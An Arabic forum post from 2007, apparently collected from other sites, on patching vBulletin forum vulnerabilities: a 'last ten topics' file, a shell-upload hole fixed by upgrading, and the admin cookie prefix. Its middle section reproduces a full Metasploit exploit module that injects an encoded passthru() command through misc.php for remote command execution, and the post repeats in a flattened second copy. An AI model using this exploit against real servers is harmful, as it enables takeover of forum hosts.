بعض ثغرات المنتديات راجيه من الله الاستفاده

ياعيون دلع · 11-11-2007, 03:36 PM

سوف اضع بعض ترقيع ثغرات المنتديات راجي من الله الاستفاده
والحلول طبعا منقوله من كذا موقع ......

ثغره في ملف اخر عشره مواضيع

قم بفتح ملف العشره مواضيع باسم (last10config.php) او (configlast.php)

الترقيع سهل

ابحث عن كلمة وامسحها

$fsel

وكذلك كلمة

$ftitle

انسخ الكلمه والصقها في البحث

ثم احفظ الملف وارفعه مره اخرى ...

-------------------------------------------------------

ثغره تمكنك من رفع شل على الموقع

وللترقيع

الترقيه الي اخر اصدار او الي قبله

كود:

##
# Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
# Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
# Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
# - This is an exploit module for the ****sploit Framework, please see
# http://****sploit.com/projects/Framework for more information.
##

package Msf::Exploit:hp_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
'Name' => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'str0ke' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'RPATH' => [1, 'DATA', 'Path to the misc.php ******', '/forum/misc.php'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},

'De***********on' => Pex::Text::Freeform(qq{
This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),

'Refs' =>
[
['MIL', '832'],
],

'Payload' =>
{
'Space' => 512,
'Keys' => ['cmd', 'cmd_bash'],
},

'Keys' => ['vBulletin'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST') || $target_host;
my $path = $self->GetVar('RPATH');
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;

# Encode the command as a set of chr() function calls
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

# Create the get request data
my $data = "?do=page&template={\${passthru($byte)}}";

my $req =
"GET $path$data HTTP/1.1\r\n".
"Host: $vhost:$target_port\r\n".
"Content-Type: application/html\r\n".
"Content-Length: ". length($data)."\r\n".
"Connection: Close\r\n".
"\r\n";

my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError){
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}

$self->PrintLine(" Sending the malicious vBulletin Get request...");

$s->Send($req);

my $results = $s->Recv(-1, 20);
$s->Close();

return;
}

1;

وللتوضيح اكثر
الثغره في ملف

misc.php

للاهميه اخذ نسخه من الملف قبل الترقيع

------------------------------------------------------

[ثغره] بملف config.php تختص بالكوكيز

يستطيع الهكر الدخول من خلالها على بمستخدم الادمن بعد تعديل الكوكيز ..

طريقه سد الثغره كالتالي :

افتح ملف الكونفيق الي في منتداك

// Prefix that all vBulletin ******* will have
// For example
$******prefix = 'bb';

غير الحرف bb

الى اي حروف تبيها المهم غير bb

-------------------------------------------------------

منقول

[img]

[/img]

11-11-2007, 03:36 PM	#1
ياعيون دلع مشرف معدل تقييم المستوى: 1	بعض ثغرات المنتديات راجيه من الله الاستفاده سوف اضع بعض ترقيع ثغرات المنتديات راجي من الله الاستفاده والحلول طبعا منقوله من كذا موقع ...... ثغره في ملف اخر عشره مواضيع قم بفتح ملف العشره مواضيع باسم (last10config.php) او (configlast.php) الترقيع سهل ابحث عن كلمة وامسحها $fsel وكذلك كلمة $ftitle انسخ الكلمه والصقها في البحث ثم احفظ الملف وارفعه مره اخرى ... ------------------------------------------------------- ثغره تمكنك من رفع شل على الموقع وللترقيع الترقيه الي اخر اصدار او الي قبله كود: ## # Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit # Name: php_vb3_0_6.pm # License: Artistic/BSD/GPL # Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good. # # # - This is an exploit module for the **sploit Framework, please see # http://sploit.com/projects/Framework for more information. ## package Msf::Exploit:hp_vb3_0_6; use base "Msf::Exploit"; use strict; use Pex::Text; use bytes; my $advanced = { }; my $info = { 'Name' => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit', 'Version' => '$Revision: 1.0 $', 'Authors' => [ 'str0ke' ], 'Arch' => [ ], 'OS' => [ ], 'Priv' => 0, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 80], 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], 'RPATH' => [1, 'DATA', 'Path to the misc.php **', '/forum/misc.php'], 'SSL' => [0, 'BOOL', 'Use SSL'], }, 'De********on' => Pex::Text::Freeform(qq{ This module exploits a code execution flaw in vBulletin <= 3.0.6. }), 'Refs' => [ ['MIL', '832'], ], 'Payload' => { 'Space' => 512, 'Keys' => ['cmd', 'cmd_bash'], }, 'Keys' => ['vBulletin'], }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $vhost = $self->GetVar('VHOST') \|\| $target_host; my $path = $self->GetVar('RPATH'); my $cmd = $self->GetVar('EncodedPayload')->RawPayload; # Encode the command as a set of chr() function calls my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C', $cmd)); # Create the get request data my $data = "?do=page&template={\${passthru($byte)}}"; my $req = "GET $path$data HTTP/1.1\r\n". "Host: $vhost:$target_port\r\n". "Content-Type: application/html\r\n". "Content-Length: ". length($data)."\r\n". "Connection: Close\r\n". "\r\n"; my $s = Msf::Socket::Tcp->new( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'LocalPort' => $self->GetVar('CPORT'), 'SSL' => $self->GetVar('SSL'), ); if ($s->IsError){ $self->PrintLine(' Error creating socket: ' . $s->GetError); return; } $self->PrintLine(" Sending the malicious vBulletin Get request..."); $s->Send($req); my $results = $s->Recv(-1, 20); $s->Close(); return; } 1; وللتوضيح اكثر الثغره في ملف misc.php للاهميه اخذ نسخه من الملف قبل الترقيع ------------------------------------------------------ [ثغره] بملف config.php تختص بالكوكيز يستطيع الهكر الدخول من خلالها على بمستخدم الادمن بعد تعديل الكوكيز .. طريقه سد الثغره كالتالي : افتح ملف الكونفيق الي في منتداك // Prefix that all vBulletin ***** will have // For example $****prefix = 'bb'; غير الحرف bb الى اي حروف تبيها المهم غير bb ------------------------------------------------------- منقول [img][/img] من مواضيع ياعيون دلع في المنتدى 0 دموع وابتسامات 0 صور لاب توب اكبر لاب توب بالعالم 0 عاشقت المستحيل 0 إساءة جديدة للنبي بالسويد 0 كلمات اغانى اجنبيه 0 برنامج جديد Reflet.exe لعمل تموج مائي على الصور 0 عتاب 0 صور سيارة Saab 9-7x Aero 2008 0 اعشقك بصمت 0 راى مارك انتونى وشاكيرا بعمرو دياب 0 آه يازمن 0 لن اقول وداعاً 0 صور من داخل مدرسه أمريكيه .. سبـ ح ــان الله 0 طفلان دخلا القبر 0 كليبات عمرو دياب بوصلات مباشره

أدوات الموضوع	إبحث في الموضوع
عرض نسخة صالحة للطباعة أرسل هذا الموضوع إلى صديق	إبحث في الموضوع: البحث المتقدم
طرق مشاهدة الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
وصف لشكل وصفات النبي الحبيب محمد عليه الصلاه والسلام	يا عيون احمد	منتديات اسلاميه	6	06-01-2008 10:43 PM
وصف النبي r وصفاته	أسير الروح	منتديات اسلاميه	0	02-08-2008 02:44 PM
مفصل دلائل النبوة	$$$المجنوون$$$	منتديات اسلاميه	4	12-06-2007 03:00 PM
جـمـيـع الـفـتـاوي الـمـهـمـة لـلـصـائـمـيـن والـصـائـمـات	$$$ الحب الخالد $$$	الخيمه الرمضانيه	3	11-01-2007 03:03 PM

دليل	تحميل صور	مطبخ منال العالم	يوتيوب	منتدى	العاب للبنات فقط
دردشة	منتديات اسلاميه	العاب	منتدى	اغاني	افلام
مسجات	منتديات	مقاطع بلوتوث	برامج	دردشه	شات
ثيمات	نغمات	برامج جوال	طب	نكت	مركز تحميل
شعر	خواطر	اناشيد	افلام	اخبار الفن	صور
العاب فلاش	خريطه المنتدى	طبخ	ازياء	صور سيارات	قصص
صور فنانين	العاب	هكر	تصاميم	العاب جوال	كتب
منتدى العروس	اغاني	روايات	منتديات عامه	سياحه وسفر	افلام اجنبيه